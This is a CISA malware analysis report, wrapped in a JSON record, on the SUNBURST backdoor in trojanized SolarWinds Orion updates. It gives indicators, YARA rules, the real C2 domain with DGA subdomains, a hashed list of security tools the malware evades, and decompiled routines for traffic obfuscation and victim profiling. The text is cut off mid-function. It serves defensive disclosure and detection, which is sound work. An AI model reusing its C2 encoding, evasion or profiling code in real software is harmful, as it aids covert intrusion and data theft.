{
	"id": "0ab75a5c-a76d-4301-b102-d88d97fa7948",
	"created_at": "2026-04-06T00:06:32.600657Z",
	"updated_at": "2026-04-10T13:13:10.655134Z",
	"deleted_at": null,
	"sha1_hash": "5ffae5b175dbc71065f303731692e314324726cb",
	"title": "MAR-10318845-1.v1 - SUNBURST | CISA",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 138650,
	"plain_text": "MAR-10318845-1.v1 - SUNBURST | CISA\r\nPublished: 2021-04-15 · Archived: 2026-04-05 15:44:40 UTC\r\nNotification\r\nThis report is provided \"as is\" for informational purposes only. The Department of Homeland Security (DHS) does not\r\nprovide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial\r\nproduct or service referenced in this bulletin or otherwise.\r\nThis document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries\r\nminimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to\r\nstandard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the\r\nTraffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.\r\nSummary\r\nDescription\r\nThis report provides detailed analysis of several malicious artifacts associated with a sophisticated supply chain compromise\r\nof SolarWinds Orion network management software, identified by the security company FireEye as SUNBURST.\r\nAfter being delivered as part of certain SolarWinds updates, a trojanized version of the\r\n“solarwinds.orion.core.businesslayer.dll” containing SUNBURST malware is installed by a legitimate SolarWinds installer\r\napplication. The modified dynamic-link library (DLL) contains an obfuscated backdoor that allows a remote operator to\r\nexecute various functions on the compromised system, as well as deploy additional payloads and exfiltrate data. The\r\nembedded SUNBURST code encrypts its outbound communications to the remote operator using XOR encryption and\r\nmodified Base64 encoding. 
To maintain a low profile, the SUNBURST code will not run if it detects certain security\r\nsoftware running on the target system.\r\nFor a downloadable copy of IOCs, see: MAR-10318845-1.v1.stix.\r\nSubmitted Files (4)\r\n019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134 (SolarWinds.Orion.Core.Business...)\r\n32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77 (SolarWinds.Orion.Core.Business...)\r\nce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6 (SolarWinds.Orion.Core.Business...)\r\nd0d626deb3f9484e649294a8dfa814c5568f846d5aa02d4cdad5d041a29d5600 (SolarWinds-Core-v2019.4.5220-H...)\r\nDomains (1)\r\navsvmcloud.com\r\nFindings\r\n32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77\r\nTags\r\nbackdoorremote-access-trojantrojan\r\nDetails\r\nName SolarWinds.Orion.Core.BusinessLayer.dll\r\nSize 1011032 bytes\r\nType PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows\r\nMD5 b91ce2fa41029f6955bff20079468448\r\nSHA1 76640508b1e7759e548771a5359eaed353bf1eec\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 1 of 30\n\nSHA256 32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77\r\nSHA512 6a81f082f36ccbda48070772c5a97e1d7de61ad77465e7befe8cbd97df40dcc5da09c461311708e3d57527e323484b05cfd3e72a3c70e106e\r\nssdeep 12288:Zx7m/z9aEBzvnvLtYAi6uLlYQ69BBpIvF1tjpH7BKi+0A8vca9owQ:6aEBTvRBi6uL6dIvDtjpH9+0A8vca9oD\r\nEntropy 5.582827\r\nAntivirus\r\nAhnlab Backdoor/Win32.SunBurst\r\nAntiy Trojan[Backdoor]/MSIL.Agent\r\nAvira TR/Sunburst.AO\r\nBitDefender Trojan.Sunburst.A\r\nClamav Win.Countermeasure.Sunburst-9809152-0\r\nComodo Backdoor\r\nCyren W32/Trojan.BCCG-2955\r\nESET a variant of MSIL/SunBurst.A trojan\r\nEmsisoft Trojan.Win32.Sunburst (A)\r\nIkarus Backdoor.Sunburst\r\nK7 Trojan ( 00574a531 )\r\nLavasoft Trojan.Sunburst.A\r\nMcAfee Trojan-sunburst\r\nMicrosoft Security Essentials Trojan:MSIL/Solorigate.BR!dha\r\nNANOAV Trojan.Win32.SunBurst.iduxjk\r\nSophos 
Mal/Sunburst-A\r\nSymantec Backdoor.Sunburst!gen1\r\nSystweak trojan-backdoor.sunburst-r\r\nTrendMicro Backdoo.6F8C6A1E\r\nTrendMicro House Call Backdoo.6F8C6A1E\r\nVir.IT eXplorer Trojan.Win32.SunBurst.A\r\nVirusBlokAda TScope.Trojan.MSIL\r\nZillya! Backdoor.Sunburst.Win32.2\r\nYARA Rules\r\nrule CISA_10318927_01 : trojan rat SOLAR_FIRE\r\n{\r\n   meta:\r\n       Author = \"CISA Code \u0026 Media Analysis\"\r\n       Incident = \"10318927\"\r\n       Date = \"2020-12-13\"\r\n       Last_Modified = \"20201213_2145\"\r\n       Actor = \"n/a\"\r\n       Category = \"TROJAN RAT\"\r\n       Family = \"SOLAR_FIRE\"\r\n       Description = \"This signature is based off of unique strings embedded within the modified Solar Winds app\"\r\n       MD5_1 = \"b91ce2fa41029f6955bff20079468448\"\r\n       SHA256_1 = \"32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77\"\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 2 of 30\n\nMD5_2 = \"846e27a652a5e1bfbd0ddd38a16dc865\"\r\n       SHA256_2 = \"ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6\"\r\n   strings:\r\n       $s0 = { 63 00 30 00 6B 00 74 00 54 00 69 00 37 00 4B 00 4C 00 43 00 6A 00 4A 00 7A 00 4D 00 38 00 44 }\r\n       $s1 = { 41 00 41 00 3D 00 3D 00 00 21 38 00 33 00 56 00 30 00 64 00 6B 00 78 00 4A 00 4B 00 55 }\r\n       $s2 = { 63 00 2F 00 46 00 77 00 44 00 6E 00 44 00 4E 00 53 00 30 00 7A 00 4B 00 53 00 55 00 30 00 42 00 41\r\n00 41 00 3D 00 3D }\r\n       $s3 = { 53 00 69 00 30 00 75 00 42 00 67 00 41 00 3D 00 00 21 38 00 77 00 77 00 49 00 4C 00 6B 00 33 00 4B\r\n00 53 00 79 00 30 00 42 }\r\n   condition:\r\nall of them\r\n}\r\nrule FireEye_20_00025668_01 : SUNBURST APT backdoor\r\n{\r\n   meta:\r\n       Author = \"FireEye\"\r\n       Date = \"2020-12-13\"\r\n       Last_Modified = \"20201213_1917\"\r\n       Actor = \"n/a\"\r\n       Category = \"Backdoor\"\r\n       Family = \"SUNBURST\"\r\n       Description = \"This rule is looking for portions of the 
SUNBURST backdoor that are vital to how it functions.\r\nThe first signature fnv_xor matches a magic byte xor that the sample performs on process, service, and driver\r\nnames/paths. SUNBURST is a backdoor that has the ability to spawn and kill processes, write and delete files, set\r\nand create registry keys, gather system information, and disable a set of forensic analysis tools and services.\"\r\n       MD5_1 = \"\"\r\n       SHA256_1 = \"\"\r\n   strings:\r\n       $cmd_regex_encoded = \"U4qpjjbQtUzUTdONrTY2q42pVapRgooABYxQuIZmtUoA\" wide\r\n       $cmd_regex_plain = { 5C 7B 5B 30 2D 39 61 2D 66 2D 5D 7B 33 36 7D 5C 7D 22 7C 22 5B 30 2D 39 61 2D\r\n66 5D 7B 33 32 7D 22 7C 22 5B 30 2D 39 61 2D 66 5D 7B 31 36 7D }\r\n       $fake_orion_event_encoded = \"U3ItS80rCaksSFWyUvIvyszPU9IBAA==\" wide\r\n       $fake_orion_event_plain = { 22 45 76 65 6E 74 54 79 70 65 22 3A 22 4F 72 69 6F 6E 22 2C }\r\n       $fake_orion_eventmanager_encoded = \"U3ItS80r8UvMTVWyUgKzfRPzEtNTi5R0AA==\" wide\r\n       $fake_orion_eventmanager_plain = { 22 45 76 65 6E 74 4E 61 6D 65 22 3A 22 45 76 65 6E 74 4D 61 6E 61 67\r\n65 72 22 2C }\r\n       $fake_orion_message_encoded = \"U/JNLS5OTE9VslKqNqhVAgA=\" wide\r\n       $fake_orion_message_plain = { 22 4D 65 73 73 61 67 65 22 3A 22 7B 30 7D 22 }\r\n       $fnv_xor = { 67 19 D8 A7 3B 90 AC 5B }\r\n   condition:\r\n       $fnv_xor and ($cmd_regex_encoded or $cmd_regex_plain) or ( ($fake_orion_event_encoded or\r\n$fake_orion_event_plain) and ($fake_orion_eventmanager_encoded or $fake_orion_eventmanager_plain) and\r\n($fake_orion_message_encoded and $fake_orion_message_plain) )\r\n}\r\nrule FireEye_20_00025668_02 : SUNBURST APT backdoor\r\n{\r\n   meta:\r\n       Author = \"FireEye\"\r\n       Date = \"2020-12-13\"\r\n       Last_Modified = \"20201213_1917\"\r\n       Actor = \"n/a\"\r\n       Category = \"Backdoor\"\r\n       Family = \"SUNBURST\"\r\n       Description = \"The SUNBURST backdoor uses a domain generation algorithm (DGA) as part 
of C2\r\ncommunications. This rule is looking for each branch of the code that checks for which HTTP method is being used.\r\nThis is in one large conjunction, and all branches are then tied together via disjunction. The grouping is intentionally\r\ndesigned so that if any part of the DGA is re-used in another sample, this signature should match that re-used portion.\r\nSUNBURST is a backdoor that has the ability to spawn and kill processes, write and delete files, set and create\r\nregistry keys, gather system information, and disable a set of forensic analysis tools and services.\"\r\n       MD5_1 = \"\"\r\n       SHA256_1 = \"\"\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 3 of 30\n\nstrings:\r\n       $a = \"0y3Kzy8BAA==\" wide\r\n       $aa = \"S8vPKynWL89PS9OvNqjVrTYEYqNa3fLUpDSgTLVxrR5IzggA\" wide\r\n       $ab = \"S8vPKynWL89PS9OvNqjVrTYEYqPaauNaPZCYEQA=\" wide\r\n       $ac = \"C88sSs1JLS4GAA==\" wide\r\n       $ad = \"C/UEAA==\" wide\r\n       $ae = \"C89MSU8tKQYA\" wide\r\n       $af = \"8wvwBQA=\" wide\r\n       $ag = \"cyzIz8nJBwA=\" wide\r\n       $ah = \"c87JL03xzc/LLMkvysxLBwA=\" wide\r\n       $ai = \"88tPSS0GAA==\" wide\r\n       $aj = \"C8vPKc1NLQYA\" wide\r\n       $ak = \"88wrSS1KS0xOLQYA\" wide\r\n       $al = \"c87PLcjPS80rKQYA\" wide\r\n       $am = \"Ky7PLNAvLUjRBwA=\" wide\r\n       $an = \"06vIzQEA\" wide\r\n       $b = \"0y3NyyxLLSpOzIlPTgQA\" wide\r\n       $c = \"001OBAA=\" wide\r\n       $d = \"0y0oysxNLKqMT04EAA==\" wide\r\n       $e = \"0y3JzE0tLknMLQAA\" wide\r\n       $f = \"003PyU9KzAEA\" wide\r\n       $h = \"0y1OTS4tSk1OBAA=\" wide\r\n       $i = \"K8jO1E8uytGvNqitNqytNqrVA/IA\" wide\r\n       $j = \"c8rPSQEA\" wide\r\n       $k = \"c8rPSfEsSczJTAYA\" wide\r\n       $l = \"c60oKUp0ys9JAQA=\" wide\r\n       $m = \"c60oKUp0ys9J8SxJzMlMBgA=\" wide\r\n       $n = \"8yxJzMlMBgA=\" wide\r\n       $o = \"88lMzygBAA==\" wide\r\n       $p = \"88lMzyjxLEnMyUwGAA==\" wide\r\n       $q = \"C0pNL81JLAIA\" wide\r\n     
  $r = \"C07NzXTKz0kBAA==\" wide\r\n       $s = \"C07NzXTKz0nxLEnMyUwGAA==\" wide\r\n       $t = \"yy9IzStOzCsGAA==\" wide\r\n       $u = \"y8svyQcA\" wide\r\n       $v = \"SytKTU3LzysBAA==\" wide\r\n       $w = \"C84vLUpOdc5PSQ0oygcA\" wide\r\n       $x = \"C84vLUpODU4tykwLKMoHAA==\" wide\r\n       $y = \"C84vLUpO9UjMC07MKwYA\" wide\r\n       $z = \"C84vLUpO9UjMC04tykwDAA==\" wide\r\n   condition:\r\n       ($a and $b and $c and $d and $e and $f and $h and $i) or ($j and $k and $l and $m and $n and $o and $p and $q\r\nand $r and $s and ($aa or $ab)) or ($t and $u and $v and $w and $x and $y and $z and ($aa or $ab)) or ($ac and $ad\r\nand $ae and $af and $ag and $ah and ($am or $an)) or ($ai and $aj and $ak and $al and ($am or $an))\r\n}\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 2020-03-24 04:52:34-04:00\r\nImport Hash dae02f32a21e03ce65412f6e56942daa\r\nCompany Name SolarWinds Worldwide, LLC.\r\nFile Description SolarWinds.Orion.Core.BusinessLayer\r\nInternal Name SolarWinds.Orion.Core.BusinessLayer.dll\r\nLegal Copyright Copyright © 1999-2020 SolarWinds Worldwide, LLC. All Rights Reserved.\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 4 of 30\n\nOriginal Filename SolarWinds.Orion.Core.BusinessLayer.dll\r\nProduct Name SolarWinds.Orion.Core.BusinessLayer\r\nProduct Version 2019.4.5200.9083\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\n9f1dcf8b4df81fdd1e33e8157fb58d9f header 512 2.890704\r\nac9dc455a67c7f2c9f10725d66c115d1 .text 1001472 5.569219\r\n69a064c0b6001299af109ed0d06f6c6f .rsrc 1536 3.015713\r\n275a7e1f11b8e5fefa163e47c22129b4 .reloc 512 0.101910\r\nRelationships\r\n32519b85c0... Connected_To avsvmcloud.com\r\n32519b85c0... 
Contained_Within d0d626deb3f9484e649294a8dfa814c5568f846d5aa02d4cdad5d041a29d5600\r\nDescription\r\nThis file is a 32-bit .NET DLL named \"SolarWinds.Orion.Core.BusinessLayer.dll.\" It is a modified SolarWinds-signed\r\nplugin component of the Orion software framework that has been patched with the SUNBURST backdoor. This malicious\r\nfile was signed with a digital certificate issued by Symantec to SolarWinds. The digital certificate should be considered\r\ncompromised.\r\n--Begin Digital Certificate Information--\r\nSigner:     CN=\"Solarwinds Worldwide, LLC\", O=\"Solarwinds Worldwide, LLC\", L=Austin, S=Texas, C=US\r\nIssuer:     CN=Symantec Class 3 SHA256 Code Signing CA, OU=Symantec Trust Network, O=SymantecCorporation,\r\nC=US\r\nSN:         0FE973752022A606ADF2A36E345DC0ED\r\nNot Before: 1/20/2020 7:00:00 PM\r\nNot After: 1/20/2023 6:59:59 PM\r\nThumbprint: 47D92D49E6F7F296260DA1AF355F941EB25360C4\r\nStatus:     Valid\r\nStatusMsg: Signature verified.\r\n--End Digital Certificate Information--\r\nSUNBURST provides the following capabilities on a compromised system, which are discussed in further detail below.\r\n- Sets a 12 to 14 day delayed execution time\r\n- Stealth\r\n- Command and Control (C2) communication\r\n- Collect system information\r\n- Upload system information from the victim system\r\n- Run specified tasks\r\n- Terminate processes\r\n- Download, read, write, move, delete, and execute files\r\n- Compute file hashes\r\n- Reboot the system\r\n- Adjust process privileges\r\n**DELAYED EXECUTION**\r\nSUNBURST is executed by a legitimate SolarWinds software application designed to load and run SolarWinds plugins.\r\nOnce installed, it compares its last write time to a randomly generated value between 288 and 336 hours (12 - 14 days) after\r\nthe file was written. 
The malware will sleep until this calculated time frame has passed, after which, the malware will begin\r\nC2 sessions to retrieve and execute commands or \"Jobs” on behalf of the adversary.\r\n**STEALTH**\r\nSUNBURST uses obfuscated blocklists consisting of hashed process and service names to identify analysis tools and\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 5 of 30\n\nantivirus software components running as processes, services, and drivers. It utilizes a modified version of the FNV-1a hash\r\nalgorithm to determine if specific processes are running on the target system. It will enumerate and hash the process names\r\nof all running processes and compare the generated hashes to a hard-coded blocklist. If no block-listed processes are found,\r\nit will attempt to resolve the domain \"api.solarwinds.com\" to test for network connectivity. If a block-listed process is found,\r\nit does not proceed with its C2 session. This evasion technique is used to keep it from being detected. 
The hard coded\r\nhashed process names are stored in an unsigned LONG list named \"assemblyTimeStamps.\" See “**BLOCK LIST\r\nCHECKING FUNCTIONS**” below in this report for details.\r\n--Begin hard-coded list of block-listed processes and names--\r\n1475579823244607677         100-continue\r\n2734787258623754862         accept\r\n1368907909245890092         afwserv\r\n16858955978146406642        apac.lab\r\n2597124982561782591         apimonitor-x64\r\n2600364143812063535         apimonitor-x86\r\n6195833633417633900         aswengsrv\r\n2934149816356927366         aswidsagent\r\n13029357933491444455        aswidsagenta\r\n15194901817027173566        atrsdfw.sys\r\n4821863173800309721         autopsy\r\n13464308873961738403        autopsy64\r\n3320026265773918739         autoruns\r\n12969190449276002545        autoruns64\r\n10657751674541025650        autorunsc\r\n12094027092655598256        autorunsc64\r\n2760663353550280147         avastavwrapper\r\n8146185202538899243         avastsvc\r\n11818825521849580123        avastui\r\n11109294216876344399        avgadminclientservice\r\n2797129108883749491         avgidsagent\r\n3660705254426876796         avgsvc\r\n3890794756780010537         avgsvca\r\n3890769468012566366         avgsvcx\r\n12709986806548166638        avgui\r\n14095938998438966337        avgwdsvcx\r\n13611051401579634621        avp\r\n18147627057830191163        avpui\r\n16423314183614230717        bccavsvc\r\n11913842725949116895        binaryninja\r\n5449730069165757263         blacklight\r\n12679195163651834776        brcow_x_x_x_x.sys\r\n1614465773938842903         brfilter.sys\r\n11385275378891906608        carbonblack\r\n13693525876560827283        carbonblackk\r\n17204844226884380288        cavp\r\n5984963105389676759         cb\r\n17849680105131524334        cbcomms\r\n18246404330670877335        cbstream\r\n292198192373389586            cff explorer\r\n14226582801651130532        close\r\n11266044540366291518        
connection\r\n6116246686670134098         content-type\r\n10734127004244879770        cork.lab\r\n18159703063075866524        crexecprev.sys\r\n11771945869106552231        csagent\r\n9234894663364701749         csdevicecontrol\r\n9061219083560670602         csfalconcontainer\r\n8698326794961817906         csfalconservice\r\n12790084614253405985        cutter\r\n16570804352575357627        cve.sys\r\n17097380490166623672        cybkerneltracker.sys\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 6 of 30\n\n16066522799090129502        date\r\n5219431737322569038         de4dot\r\n15535773470978271326        debugview\r\n11073283311104541690        dev.local\r\n3626142665768487764         dgdmk.sys\r\n7810436520414958497         diskmon\r\n4030236413975199654         dmz.local\r\n13316211011159594063        dnsd\r\n13825071784440082496        dnspy\r\n14480775929210717493        dotpeek32\r\n14482658293117931546        dotpeek64\r\n8473756179280619170         dumpcap\r\n15587050164583443069        eamonm\r\n12718416789200275332        eaw.sys\r\n9559632696372799208         eelam\r\n607197993339007484            egui\r\n14513577387099045298        eguiproxy\r\n4931721628717906635         ehdrv\r\n14079676299181301772        ekbdflt\r\n3200333496547938354         ekrn\r\n2589926981877829912         ekrnepfw\r\n8727477769544302060         emea.sales\r\n17939405613729073960        epfw\r\n17997967489723066537        epfwwfp\r\n3778500091710709090         evidence center\r\n8799118153397725683         exeinfope\r\n8873858923435176895         expect\r\n13783346438774742614        f-secure filter\r\n16112751343173365533        f-secure gatekeeper\r\n17624147599670377042        f-secure gatekeeper handler starter\r\n3425260965299690882         f-secure hips\r\n16066651430762394116        f-secure network request broker\r\n2380224015317016190         f-secure recognizer\r\n13655261125244647696        f-secure webui daemon\r\n12027963942392743532        
fakedns\r\n576626207276463000            fakenet\r\n9384605490088500348         fe_avk\r\n15092207615430402812        feelam\r\n6274014997237900919         fekern\r\n3320767229281015341         fewscservice\r\n7412338704062093516         ffdec\r\n682250828679635420            fiddler\r\n13014156621614176974        fileinsight\r\n18150909006539876521        floss\r\n5587557070429522647         fnrb32\r\n12445177985737237804        fsaua\r\n12445232961318634374        fsaus\r\n17017923349298346219        fsav32\r\n9333057603143916814         fsbts\r\n541172992193764396            fsdevcon\r\n10393903804869831898        fsdfw\r\n3413052607651207697         fses\r\n3407972863931386250         fsfw\r\n10545868833523019926        fsgk32\r\n521157249538507889            fsgk32st\r\n3421213182954201407         fsma\r\n15039834196857999838        fsma32\r\n3421197789791424393         fsms\r\n3413886037471417852         fsni\r\n17978774977754553159        fsorsp\r\n14243671177281069512        fsorspclient\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 7 of 30\n\n14055243717250701608        fssm32\r\n7315838824213522000         fsvista\r\n14971809093655817917        fswebuid\r\n10336842116636872171        gdb\r\n6943102301517884811         groundling32.sys\r\n13544031715334011032        groundling64.sys\r\n397780960855462669            hexisfsmonitor.sys\r\n13260224381505715848        hiew32\r\n12785322942775634499        hiew32demo\r\n17956969551821596225        hollows_hunter\r\n14256853800858727521        idaq\r\n8709004393777297355         idaq64\r\n8129411991672431889         idr\r\n15514036435533858158        if-modified-since\r\n15997665423159927228        ildasm\r\n10829648878147112121        ilspy\r\n9149947745824492274         jd-gui\r\n13852439084267373191        keep-alive\r\n17633734304611248415        ksde\r\n13581776705111912829        ksdeui\r\n4578480846255629462         lab.brno\r\n8381292265993977266         
lab.local\r\n3796405623695665524         lab.na\r\n5942282052525294911         lab.rio\r\n17984632978012874803        libwamf.sys\r\n3656637464651387014         lordpe\r\n2717025511528702475         lragentmf.sys\r\n10501212300031893463        microsoft.tri.sensor\r\n155978580751494388            microsoft.tri.sensor.updater\r\n5183687599225757871         msmpeng\r\n10063651499895178962        mssense\r\n3575761800716667678         officemalscanner\r\n4501656691368064027         ollydbg\r\n7701683279824397773         pci.local\r\n10296494671777307979        pdfstreamdumper\r\n14630721578341374856        pe-bear\r\n6461429591783621719         pe-sieve32\r\n6508141243778577344         pe-sieve64\r\n4088976323439621041         pebrowse64\r\n9531326785919727076         peid\r\n10235971842993272939        pestudio\r\n2478231962306073784         peview\r\n9903758755917170407         pexplorer\r\n14710585101020280896        ppee\r\n2810460305047003196         procdump\r\n13611814135072561278        procdump64\r\n2032008861530788751         processhacker\r\n6491986958834001955         procexp\r\n27407921587843457             procexp64\r\n2128122064571842954         procmon\r\n10484659978517092504        prodiscoverbasic\r\n2532538262737333146         psanhost\r\n835151375515278827            psepfilter.sys\r\n6088115528707848728         psuamain\r\n4454255944391929578         psuaservice\r\n8478833628889826985         py2exedecompiler\r\n10463926208560207521        r2agent\r\n7080175711202577138         rabin2\r\n8697424601205169055         radare2\r\n16130138450758310172        ramcapture\r\n7775177810774851294         ramcapture64\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 8 of 30\n\n700598796416086955            redcloak\r\n9007106680104765185         referer\r\n506634811745884560            reflector\r\n18294908219222222902        regmon\r\n3588624367609827560         resourcehacker\r\n9555688264681862794         
retdec-ar-extractor\r\n5415426428750045503         retdec-bin2llvmir\r\n3642525650883269872         retdec-bin2pat\r\n13135068273077306806        retdec-config\r\n3769837838875367802         retdec-fileinfo\r\n191060519014405309            retdec-getsig\r\n1682585410644922036         retdec-idr2pat\r\n7878537243757499832         retdec-llvmir2hll\r\n13799353263187722717        retdec-macho-extractor\r\n1367627386496056834         retdec-pat2yara\r\n12574535824074203265        retdec-stacofin\r\n16990567851129491937        retdec-unpacker\r\n8994091295115840290         retdec-yarac\r\n13876356431472225791        rundotnetdll\r\n18392881921099771407        rvsavd.sys\r\n5132256620104998637         saas.swi\r\n11801746708619571308        safe-agent.sys\r\n14968320160131875803        sbiesvc\r\n14868920869169964081        scdbg\r\n106672141413120087            scylla_x64\r\n79089792725215063             scylla_x86\r\n16335643316870329598        sense\r\n12343334044036541897        sentinelmonitor.sys\r\n5614586596107908838         shellcode_launcher\r\n17291806236368054941        solarwinds.businesslayerhost\r\n3869935012404164040         solarwindsdiagnostics\r\n15267980678929160412        swdev.dmz\r\n1109067043404435916         swdev.local\r\n14111374107076822891        sysmon\r\n3538022140597504361         sysmon64\r\n7175363135479931834         tanium\r\n3178468437029279937         taniumclient\r\n13599785766252827703        taniumdetectengine\r\n6180361713414290679         taniumendpointindex\r\n8612208440357175863         taniumtracecli\r\n8408095252303317471         taniumtracewebsocketclient64\r\n7982848972385914508         task explorer\r\n8760312338504300643         task explorer-64\r\n17351543633914244545        tcpdump\r\n7516148236133302073         tcpvcon\r\n15114163911481793350        tcpview\r\n7574774749059321801         user-agent\r\n15457732070353984570        vboxservice\r\n16292685861617888592        win32_remote\r\n10374841591685794123        
win64_remotex64\r\n3045986759481489935         windbg\r\n917638920165491138            windefend\r\n17109238199226571972        windump\r\n5945487981219695001         winhex\r\n6827032273910657891         winhex64\r\n8052533790968282297         winobj\r\n17574002783607647274        wireshark\r\n3341747963119755850         x32dbg\r\n14193859431895170587        x64dbg\r\n15695338751700748390        xagt\r\n640589622539783622            xagtnotif\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 9 of 30\n\n17683972236092287897        xwforensics\r\n17439059603042731363        xwforensics64\r\n--End hard-coded list of block-listed processes and names--\r\n**COMMAND AND CONTROL**\r\nDuring runtime, SUNBURST hashes its own parent process name, and compares it to the value 17291806236368054941. If\r\nit does not match, the malicious class “OrionImprovementBusinessLayer” will stop executing and the DLL will continue\r\nnormal activity.\r\nWhen communicating with its C2, SUNBURST utilizes the Orion Improvement Program (OIP) protocol to disguise network\r\nactivity as normal SolarWinds Orion traffic. The connection with the C2 server will contain a randomly generated “customer\r\nID\" that allows the adversary to track different compromised systems.\r\nTo establish C2, it will construct and resolve the subdomains of \"avsvmcloud.com\" using a domain generation algorithm\r\n(DGA). 
The following format is used to generate the domain name:\r\n--Begin format of the domain name--\r\n.appsync-api.eu-west-1.avsvmcloud.com\r\n.appsync-api.us-west-2.avsvmcloud.com\r\n.appsync-api.us-east-1.avsvmcloud.com\r\n.appsync-api.us-east-2.avsvmcloud.com\r\n--End format of the domain name--\r\nIt will attempt to make a Canonical Name (CNAME) query according to different third-level domain names in combination\r\nwith the DGA to verify the C2 server is accessible before executing its command control session.\r\n--Begin domain names combined with DGA--\r\n6a57jk2ba1d9keg15cbg.appsync-api.eu-west-1.avsvmcloud.com\r\n7sbvaemscs0mc925tb99.appsync-api.us-west-2.avsvmcloud.com\r\ngq1h856599gqh538acqn.appsync-api.us-west-2.avsvmcloud.com\r\nihvpgv9psvq02ffo77et.appsync-api.us-east-2.avsvmcloud.com\r\nk5kcubuassl3alrf7gm3.appsync-api.eu-west-1.avsvmcloud.com\r\nmhdosoksaccf9sni9icp.appsync-api.eu-west-1.avsvmcloud.com\r\n--End domain names plus DGA--\r\nOutbound communications are encrypted using an embedded class named “CryptoHelper.” The class contains two functions\r\nnamed “CreateSecureString” and “Base64Encode.” The function “CreateSecureString” creates a random byte and then\r\nutilizes this random byte to encode the string provided. The randomly generated byte, used as the XOR key, will be stored at\r\noffset 0x00 of the encoded string -- allowing the adversary to decrypt the traffic received from this implant. The function\r\n“CreateSecureString” takes two arguments, a byte array which will be the data targeted for encryption and a bool variable. If\r\nthis variable is set to \"true\" the function will “OR” the generated “XOR” key byte with the value 128 before using it to XOR\r\nencode the provided data. 
It then calls the Base64Encode function to further obfuscate the communication.\r\n--Begin CreateSecureString Function--\r\nprivate static string CreateSecureString(byte[] data, bool flag)\r\n       {\r\n           byte[] bytes = new byte[data.Length + 1];\r\n           bytes[0] = (byte)new Random().Next(1, (int)sbyte.MaxValue);\r\n           if (flag)\r\n               bytes[0] |= (byte)128;\r\n           for (int index = 1; index \u0026lt; bytes.Length; ++index)\r\n               bytes[index] = (byte)((uint)data[index - 1] ^ (uint)bytes[0]);\r\n           return Base64Encode(bytes, true);\r\n       }\r\n--End CreateSecureString Function--\r\nThe Base64Encode function is a modified version of the Base64 algorithm that uses the custom alphabet,\r\n\"ph2eifo3n5utg1j8d94qrvbmk0sal76c.” This custom Base64 encoding makes it harder to interpret network traffic sent\r\nbetween this malicious implant and the remote C2 server. The custom Base64 alphabet and algorithm utilized would be\r\nrequired to decode the network traffic.\r\n--Begin Base64Encode Function--\r\nprivate static string Base64Encode(byte[] bytes, bool rt)\r\n    {\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 10 of 30\n\nstring str1 =\r\nOrionImprovementBusinessLayer.ZipHelper.Unzip(\"K8gwSs1MyzfOMy0tSTfMskixNCksKkvKzTYoTswxN0sGAA==\");\r\n       string str2 = \"\";\r\n       uint num1 = 0;\r\n       int num2 = 0;\r\n       foreach (byte num3 in bytes)\r\n       {\r\n        num1 |= (uint) num3 \u0026lt;\u0026lt; num2;\r\n        for (num2 += 8; num2 \u0026gt;= 5; num2 -= 5)\r\n        {\r\n           str2 += str1[(int) num1 \u0026amp; 31].ToString();\r\n           num1 \u0026gt;\u0026gt;= 5;\r\n        }\r\n       }\r\n       if (num2 \u0026gt; 0)\r\n       {\r\n        if (rt)\r\n           num1 |= (uint) (new Random().Next() \u0026lt;\u0026lt; num2);\r\n        str2 += str1[(int) num1 \u0026amp; 31].ToString();\r\n       }\r\n       return str2;\r\n    }\r\n--End Base64Encode 
Function--\r\n**COLLECT SYSTEM INFORMATION**\r\nThe collection of system description info is carried out by the CollectSystemDescription function.\r\nIt will collect the following information:\r\nVictim domain SID\r\nDomain name\r\nHostname\r\nUsername\r\nOperating System (OS) version\r\nSystem directory\r\nEnvironment tick count - the time since the system was last rebooted.\r\npublic static void CollectSystemDescription(string info, out string result)\r\n{\r\nresult = (string) null;\r\nint i = 0;\r\nstring domainName = IPGlobalProperties.GetIPGlobalProperties().DomainName;\r\nresult = result + OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i) +\r\ndomainName;\r\ntry\r\n{\r\nstring str = ((SecurityIdentifier) new NTAccount(domainName,\r\nOrionImprovementBusinessLayer.ZipHelper.Unzip(Administrator)).Translate(typeof\r\n(SecurityIdentifier))).AccountDomainSid.ToString();\r\nresult = result + OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i) +\r\nstr;\r\n}\r\ncatch\r\n{\r\nresult += OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i);\r\n}\r\nresult = result + OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i) +\r\nIPGlobalProperties.GetIPGlobalProperties().HostName;\r\nresult = result + 